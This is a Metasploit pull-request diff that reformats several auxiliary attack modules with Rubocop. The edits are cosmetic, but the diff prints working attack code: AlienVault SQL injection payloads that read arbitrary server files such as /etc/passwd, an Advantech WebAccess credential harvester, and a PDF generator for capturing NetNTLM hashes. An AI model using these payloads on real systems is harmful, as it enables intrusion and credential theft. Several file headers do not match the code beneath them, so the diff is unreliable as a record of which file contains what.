Merge pull request #20329 from cgranleese-r7/runs-layout-rubocop-on-modules

Runs Rubocop to fix layout in modules

Author: adfoster-r7

modules/auxiliary/admin/mssql/mssql_enum.rb

@@ -22,9 +22,9 @@ module to work, valid administrative user credentials must be
         'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
         'License' => MSF_LICENSE,
         'Notes' => {
-           'Stability' => [CRASH_SAFE],
-           'SideEffects' => [IOC_IN_LOGS],
-           'Reliability' => []
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
         }
       )
     )

modules/auxiliary/admin/smb/ms17_010_command.rb

@@ -111,7 +111,7 @@ def smb_pwn(ip)
     report_note(
       :rhost => datastore['RHOSTS'],
       :rport => datastore['RPORT'],
-      :type  => "psexec_command",
+      :type => "psexec_command",
       :name => datastore['COMMAND'],
       :data => { :command_output => output }
     )

modules/auxiliary/cloud/aws/enum_ec2.rb

@@ -89,7 +89,7 @@ def describe_ec2_instance(inst)
     #  host: inst.private_ip_address,
     #  type: 'ec2.public_ips',
     #  data: { :eips => eips.join(' ') }
-    #) unless eips.empty?
+    # ) unless eips.empty?
     if inst.public_ip_address && !inst.public_dns_name.empty?
       report_note(
         host: inst.private_ip_address,

modules/auxiliary/dos/http/apache_range_dos.rb

@@ -84,10 +84,10 @@ def check_for_dos
       print_status("Found Byte-Range Header DOS at #{uri}")
 
       report_note(
-        :host   => rhost,
-        :port   => rport,
-        :type   => 'apache.killer',
-        :data   => { :uri => uri }
+        :host => rhost,
+        :port => rport,
+        :type => 'apache.killer',
+        :data => { :uri => uri }
       )
 
     else

modules/auxiliary/fileformat/badpdf.rb

@@ -7,27 +7,28 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::FILEFORMAT
 
   def initialize(info = {})
-    super(update_info(info,
-        'Name'          => 'BADPDF Malicious PDF Creator',
-        'Description'   => '
+    super(
+      update_info(
+        info,
+        'Name' => 'BADPDF Malicious PDF Creator',
+        'Description' => %q{
           This module can either creates a blank PDF file which contains a UNC link which can be used
           to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
           code into an existing PDF document if possible.
-        ',
-        'License'       => MSF_LICENSE,
-        'Author'        =>
-            [
-              'Assaf Baharav',    # Code provided as POC by CheckPoint
-              'Yaron Fruchtmann', # Code provided as POC by CheckPoint
-              'Ido Solomon',      # Code provided as POC by CheckPoint
-              'Richard Davy - secureyourit.co.uk', # Metasploit
-            ],
-        'Platform'      => ['win'],
-        'References'    =>
-        [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Assaf Baharav', # Code provided as POC by CheckPoint
+          'Yaron Fruchtmann', # Code provided as POC by CheckPoint
+          'Ido Solomon',      # Code provided as POC by CheckPoint
+          'Richard Davy - secureyourit.co.uk', # Metasploit
+        ],
+        'Platform' => ['win'],
+        'References' => [
           ['CVE', '2018-4993'],
           ['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
-        ])
+        ]
+      )
       )
     register_options(
       [

modules/auxiliary/fileformat/odt_badodt.rb

@@ -6,35 +6,37 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
-      'Description'    => %q{
-        This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
-        Although authentication is required, any level of user permission can exploit this vulnerability.
-
-        Note that 8.2 is not suitable for this.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
+        'Description' => %q{
+          This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
+          Although authentication is required, any level of user permission can exploit this vulnerability.
+
+          Note that 8.2 is not suitable for this.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
           'sinn3r', # Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2016-5810'],
           ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
         ],
-      'DisclosureDate' => '2017-01-21'
-    ))
+        'DisclosureDate' => '2017-01-21'
+      )
+    )
 
     register_options(
       [
         OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
         OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
         OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
-      ])
+      ]
+    )
   end
 
   def do_login
@@ -43,15 +45,15 @@ def do_login
     uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')
 
     res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => uri,
+      'method' => 'POST',
+      'uri' => uri,
       'vars_post' => {
         'page' => '/',
-        'pos'  => '',
+        'pos' => '',
         'username' => datastore['WEBACCESSUSER'],
         'password' => datastore['WEBACCESSPASS'],
-        'remMe'    => '',
-        'submit1'  => 'Login'
+        'remMe' => '',
+        'submit1' => 'Login'
       }
     })
 
@@ -77,11 +79,11 @@ def do_login
   def get_user_cred_detail(sid, user)
     vprint_status("Gathering password for user: #{user}")
 
-    uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')
+    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => uri,
+      'uri' => uri,
       'cookie' => sid,
       'vars_get' => {
         'uname' => user
@@ -106,7 +108,7 @@ def get_users_page(sid)
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => uri,
+      'uri' => uri,
       'cookie' => sid
     })
 

modules/auxiliary/gather/advantech_webaccess_creds.rb

@@ -6,45 +6,45 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
-      'Description'    => %q{
-        AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
-        generation PHP file. This module exploits this to read an arbitrary file from
-        the file system. Any authenticated user is able to exploit it, as administrator
-        privileges aren't required.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+        'Description' => %q{
+          AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
+          generation PHP file. This module exploits this to read an arbitrary file from
+          the file system. Any authenticated user is able to exploit it, as administrator
+          privileges aren't required.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
         ],
-      'References'     =>
-        [
+        'References' => [
           ['EDB', '32644']
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'SSL' => true
         },
-      'Platform'       => ['linux'],
-      'Privileged'     => false,
-      'DisclosureDate' => '2014-03-30'))
+        'Platform' => ['linux'],
+        'Privileged' => false,
+        'DisclosureDate' => '2014-03-30'
+      )
+    )
 
-      register_options(
+    register_options(
       [
         Opt::RPORT(443),
         OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
         OptString.new('USERNAME', [ true, 'Single username' ]),
         OptString.new('PASSWORD', [ true, 'Single password' ]),
         OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
-      ])
-
+      ]
+    )
   end
 
   def run
-
     print_status("Get a valid session cookie...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -113,17 +113,17 @@ def run
       full << str
       vprint_status(str)
 
-      i = i+1
+      i = i + 1
     end
 
     path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
     print_good("File stored at path: " + path)
   end
 
   def sqli(left_marker, right_marker, i, cookie, filename)
-    pay =  "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+    pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
     pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
-    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
     pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
 
     get = {
@@ -145,4 +145,3 @@ def sqli(left_marker, right_marker, i, cookie, filename)
     end
   end
 end
-

modules/auxiliary/gather/alienvault_iso27001_sqli.rb

@@ -6,46 +6,46 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
-      'Description'    => %q{
-        AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
-        newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
-        to read an arbitrary file from the file system. Any authenticated user is able to exploit
-        this, as administrator privileges are not required.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+        'Description' => %q{
+          AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
+          newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
+          to read an arbitrary file from the file system. Any authenticated user is able to exploit
+          this, as administrator privileges are not required.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Chris Hebert <chrisdhebert[at]gmail.com>'
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2014-5383'],
           ['OSVDB', '106815'],
           ['EDB', '33317'],
           ['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'SSL' => true
         },
-      'Privileged'     => false,
-      'DisclosureDate' => '2014-05-09'))
-
-      register_options([
-        Opt::RPORT(443),
-        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
-        OptString.new('USERNAME', [ true, 'Single username' ]),
-        OptString.new('PASSWORD', [ true, 'Single password' ]),
-        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
-        OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
-      ])
+        'Privileged' => false,
+        'DisclosureDate' => '2014-05-09'
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
+      OptString.new('USERNAME', [ true, 'Single username' ]),
+      OptString.new('PASSWORD', [ true, 'Single password' ]),
+      OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
+      OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
+    ])
   end
 
   def run
-
     print_status("Get a valid session cookie...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -117,7 +117,7 @@ def run
           full << str
           vprint_status(str)
 
-          i = i+1
+          i = i + 1
         end
       end
     rescue ::Timeout::Error
@@ -134,9 +134,9 @@ def run
   end
 
   def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
-    pay =  "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+    pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
     pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
-    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
     pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"
 
     get = {